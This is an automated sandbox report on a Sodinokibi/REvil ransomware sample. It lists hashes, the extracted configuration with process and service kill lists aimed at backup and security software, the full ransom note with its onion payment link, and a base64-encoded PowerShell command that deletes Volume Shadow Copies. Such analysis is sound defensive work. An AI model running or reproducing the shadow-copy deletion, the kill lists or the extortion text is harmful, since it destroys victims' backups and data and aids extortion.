Analysis

  • max time kernel
    96s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-12-2024 01:35

General

  • Target

    fa7d2020776a080d2580c0cad013be84484cbaa8d927fedd51914bad567d3278.exe

  • Size

    338KB

  • MD5

    d44186f7b95ba487fc1c54a05d68f04f

  • SHA1

    f259705190dc78c7575544f22dbaad9066cd3f6b

  • SHA256

    fa7d2020776a080d2580c0cad013be84484cbaa8d927fedd51914bad567d3278

  • SHA512

    5a14e02a8cf384e73ca115bf7ada61625c06453a9123d71a55f9f25fda21d3551160b21b2f1a47888ae2e54731e65315c46025dd99b717ac16e3e1fab89a4ee9

  • SSDEEP

    6144:xuqAdxB6/8KdzaacY9VpmvcP0GdDlTj2pxRdCgNKTE:xIe8KNrcouc8ujwogNKTE

Malware Config

Extracted

Family

sodinokibi

Botnet

$2a$10$C7h8RDw.z6fjHkEKce6Gde74pzmrAUjJx450POTKe2M3TmsCFxG86

Campaign

4619

Decoy

newyou.at

manifestinglab.com

lichencafe.com

sportverein-tambach.de

dr-tremel-rednitzhembach.de

wychowanieprzedszkolne.pl

sotsioloogia.ee

zweerscreatives.nl

amerikansktgodis.se

div-vertriebsforschung.de

webhostingsrbija.rs

kaotikkustomz.com

surespark.org.uk

cwsitservices.co.uk

stefanpasch.me

lascuola.nl

oemands.dk

pasivect.co.uk

connectedace.com

international-sound-awards.com

Attributes
  • net

    false

  • pid

    $2a$10$C7h8RDw.z6fjHkEKce6Gde74pzmrAUjJx450POTKe2M3TmsCFxG86

  • prc

    benetns

    sqbcoreservice

    pvlsvr

    ocomm

    agntsvc

    tbirdconfig

    dbsnmp

    outlook

    ocautoupds

    VeeamTransportSvc

    infopath

    onenote

    steam

    ocssd

    bedbh

    VeeamDeploymentSvc

    synctime

    wordpad

    mspub

    isqlplussvc

    xfssvccon

    visio

    thunderbird

    oracle

    CagService

    dbeng50

    bengien

    mydesktopqos

    DellSystemDetect

    encsvc

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    4619

  • svc

    MSSQL$

    BackupExecJobEngine

    CASAD2DWebSvc

    veeam

    bedbg

    sql

    BackupExecRPCService

    vss

    BackupExecVSSProvider

    PDVFSService

    memtas

    VSNAPVSS

    MSSQL

    AcrSch2Svc

    AcronisAgent

    MSExchange$

    VeeamNFSSvc

    VeeamDeploymentService

    ARSM

    MSExchange

    VeeamTransportSvc

    sophos

    WSBExchange

    svc$

    MVarmor64

    BackupExecAgentAccelerator

    mepocs

    BackupExecDiveciMediaService

    stc_raw_agent

    BackupExecAgentBrowser

Extracted

Path

C:\Users\08125vk301-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 08125vk301. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/41F1E020AA50216A 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/41F1E020AA50216A Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: bhoW6fOSi8zp4+R8JZCLE6ITWkfnQp6qIv6iXPmOxKSBM/UI2dECoY+9Zxqp5IcC 4bNdTAP5Don6Ttek7mNskMyQqV6Vg6I/4Y1TK7fB4e+YzD1WiKUHvuxYvbHS4ilz JqxMoQEQ6ZRNYvjI2jbFXhrsC9m58w7+4tfA+ygVLeZ1k4vsv2SN/DOsZibGtwdN 6aX7hjMng4MeHDa5NS3H2M6dJkzxwKwxFP5rva6ODxi4S9tohQFpzse2ctDyY9CG VdsqBlhpHcvkvlEuV30utkvzHHpKI/XnROvr20KLVfxKFQAdbsQohXzeJmyEZ5Vx E7Mq5S2IpsIqfiTZKgnVrpZXr4Mj8qO5T1Rr5xBis654uNRMy3Cs+1t2/FlQ9OmD YdULHuJDfx0f0+teRhoZ+PLPjmn0sbT5Zjt36hL/JQFHnmE8EcZ+uCyFNakjOpsg 63ygNJniwmpxuk8c9NezBoB4AufRUwu2GXxUGbTLlTV7gVR0jjM2lHvnlaYuih5N 0qWT2lH/eT6I3JEzyU3zfIXaoII1o+E8e1INSQo6jTYCaMbqAPHwCcvR9/QcZqbb tbfBBYaPMonuJ3LQw7wo9bR7qbY7xgi0MlYzt4gkZJVPTAzf7mQUjW9GF+7faR0w Bu2yHO4Sodi2lVlnCwUJwxDN8OLSOKbgLCL0ksn2r1aLqwBJuqASjaN54mD2QWZL d8YpI9l6ySs2lodzvt8Bf7vkrfwOoS/SErDUtGyh7t+XiNHz+i9HA2zGUqcNSX3R TdMI5DNOdP20qWuMAkB8vx0AeluTAhJoIqukCczkjlcAhxzCjZPSz+v68anWE87S 77tuab3uESvhIrHE1aI91CzA75OEca8uebdDx9IyTTuUjoEz9Lw7CjGXCfl8XouU KqHA5/iaa5IhsFoDDc7N/pY+8ZboA4NdKjUK0394LzcF1XkQhRRy/PPgpPvB5gO7 GMuvscrcT+bdHBKI1FfSk17My7Tzqum/lqfXsLYLtNz2608wh/FIo5fHq5IE725U 99OyUXedSF3LSRd+OKFCrSfYk/sK210TQ9tlOY9Y0x4utt7bcxZw3dFq9Y3L0Ot1 kIbHjNlX/84Zc75VRhWFQdCWTY7+7mDsy8dnS3cdPc3HjzFG57DLQxEO1w7wZoG5 7kGrZb1Gg0UbVqy7i8Hky6aZl/1GPVwgLxh6EH9clqUSZYHAa1fzw5q8rNAVLCdt UgdLBKjw4nPdiTrb4hyVwXX25NgeQ49xQlZ6+iZ2I5iwWlTQJf4K394z0GGv3UT1 4hp3C/Fo5nvPjy1Qs2YQ8malvVoo4GhW2VyTspxK0Lwcw8fIIl+rOJPQddSDtigN cYkrMD5dU1kyDQkroabh3yyAQUfHlkayQWreuCPazXKOxZAWDkDb5Z29nzyKTw== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/41F1E020AA50216A

http://decryptor.cc/41F1E020AA50216A

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Sodinokibi family
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 11 IoCs
  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\fa7d2020776a080d2580c0cad013be84484cbaa8d927fedd51914bad567d3278.exe
    "C:\Users\Admin\AppData\Local\Temp\fa7d2020776a080d2580c0cad013be84484cbaa8d927fedd51914bad567d3278.exe"
    1⤵
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4528
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3300
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4528 -s 656
      2⤵
      • Program crash
      PID:4532
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:3580
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3880
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4528 -ip 4528
      1⤵
        PID:1548

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\08125vk301-readme.txt

        Filesize

        6KB

        MD5

        80dc3919e37343a02477891f5170c571

        SHA1

        98d73720eb9773a52ca09c9afedc7e062dde40f8

        SHA256

        5ae833417040a94d7b2912ac498e18a469f0cc2c5933b6910e1188484180a990

        SHA512

        fb04ea3f18d2012b730a073f34fee2e44ebc7cb9233039488fa1f8c4209a0e17b29486717f65d139e7a71db726d5cf255d52bff009b7b28c991047332d0e98f2

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_klv3cf0f.2io.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • memory/3300-14-0x000001FECB8F0000-0x000001FECB912000-memory.dmp

        Filesize

        136KB

      • memory/3300-16-0x00007FF856080000-0x00007FF856B41000-memory.dmp

        Filesize

        10.8MB

      • memory/3300-4-0x00007FF856083000-0x00007FF856085000-memory.dmp

        Filesize

        8KB

      • memory/3300-19-0x00007FF856080000-0x00007FF856B41000-memory.dmp

        Filesize

        10.8MB

      • memory/3300-15-0x00007FF856080000-0x00007FF856B41000-memory.dmp

        Filesize

        10.8MB

      • memory/4528-21-0x0000000000580000-0x0000000000680000-memory.dmp

        Filesize

        1024KB

      • memory/4528-3-0x0000000000400000-0x000000000048D000-memory.dmp

        Filesize

        564KB

      • memory/4528-2-0x0000000000400000-0x000000000041F000-memory.dmp

        Filesize

        124KB

      • memory/4528-22-0x0000000000400000-0x000000000041F000-memory.dmp

        Filesize

        124KB

      • memory/4528-23-0x0000000000400000-0x000000000048D000-memory.dmp

        Filesize

        564KB

      • memory/4528-1-0x0000000000580000-0x0000000000680000-memory.dmp

        Filesize

        1024KB

      • memory/4528-96-0x0000000000400000-0x000000000048D000-memory.dmp

        Filesize

        564KB

      • memory/4528-436-0x0000000000400000-0x000000000048D000-memory.dmp

        Filesize

        564KB

      • memory/4528-441-0x0000000000400000-0x000000000048D000-memory.dmp

        Filesize

        564KB

      • memory/4528-442-0x0000000000400000-0x000000000041F000-memory.dmp

        Filesize

        124KB